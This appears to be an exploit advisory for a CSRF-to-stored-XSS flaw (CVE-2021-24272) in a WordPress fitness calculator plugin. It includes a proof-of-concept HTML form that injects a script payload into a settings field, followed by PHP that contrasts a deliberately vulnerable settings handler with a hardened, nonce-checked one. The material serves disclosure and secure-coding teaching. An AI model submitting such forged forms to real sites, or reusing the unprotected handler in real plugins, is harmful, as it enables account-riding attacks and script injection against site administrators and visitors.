# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/fitness-calculators/
# Version: 1.9.5
# Tested on: Windows 10
# CVE: CVE-2021-24272

1. Description:

The plugin adds calculators for water intake, BMI, protein intake, and body fat, and lacked a CSRF check, allowing attackers to make logged-in users perform unwanted actions, such as changing the calculator headings.

Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue.

2. Proof of Concept:

<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
<input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
<input type="submit" value="Save" name="submit">
</form>
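Added example (not the plugin's own code): a minimal WordPress settings handler for the fcw[fcw_heading] field, showing the pattern the advisory describes (settings saved from any POST, stored raw) beside a hardened version that ties the form to a nonce, sanitises on save and escapes on output. Function names (fcw_*) and the fcw_heading option name are assumptions.

```php
<?php
// Vulnerable pattern: every POST that reaches the settings page is trusted and
// the value is stored unchanged. A form on a third-party site submitted by a
// logged-in admin is accepted (CSRF), and markup survives into the page (stored XSS).
function fcw_save_heading_vulnerable() {
    if ( isset( $_POST['fcw']['fcw_heading'] ) ) {
        update_option( 'fcw_heading', $_POST['fcw']['fcw_heading'] ); // no nonce, no sanitisation
    }
}

// Hardened pattern, part 1: the settings form carries a nonce bound to this
// action and the current user; a cross-site form cannot produce that value.
function fcw_render_heading_form() {
    $heading = get_option( 'fcw_heading', '' );
    echo '<form method="post" action="'
        . esc_url( admin_url( 'admin.php?page=fcp_dashboard&tab=water' ) ) . '">';
    wp_nonce_field( 'fcw_save_heading', 'fcw_nonce' ); // hidden nonce + referer fields
    echo '<input type="text" name="fcw[fcw_heading]" value="' . esc_attr( $heading ) . '">';
    echo '<input type="submit" name="submit" value="Save">';
    echo '</form>';
}

// Hardened pattern, part 2: capability check, nonce check, then sanitise before storing.
function fcw_save_heading_hardened() {
    if ( ! isset( $_POST['fcw']['fcw_heading'] ) ) {
        return;
    }
    // Only users permitted to manage settings may change the heading.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // check_admin_referer() terminates the request unless a valid nonce for this
    // action was submitted in the 'fcw_nonce' field.
    check_admin_referer( 'fcw_save_heading', 'fcw_nonce' );
    // Strip tags, line breaks and control characters from the submitted value.
    $heading = sanitize_text_field( wp_unslash( $_POST['fcw']['fcw_heading'] ) );
    update_option( 'fcw_heading', $heading );
}

// Hardened pattern, part 3: escape for HTML context wherever the heading is printed,
// so a value that slipped past sanitisation still cannot execute as script.
function fcw_print_heading() {
    echo '<h2>' . esc_html( get_option( 'fcw_heading', '' ) ) . '</h2>';
}
```

With the hardened handler in place, the form in the proof of concept above is rejected by check_admin_referer() because it carries no fcw_nonce field, and the alert payload would be reduced to plain text by sanitize_text_field() and esc_html() even if it were stored.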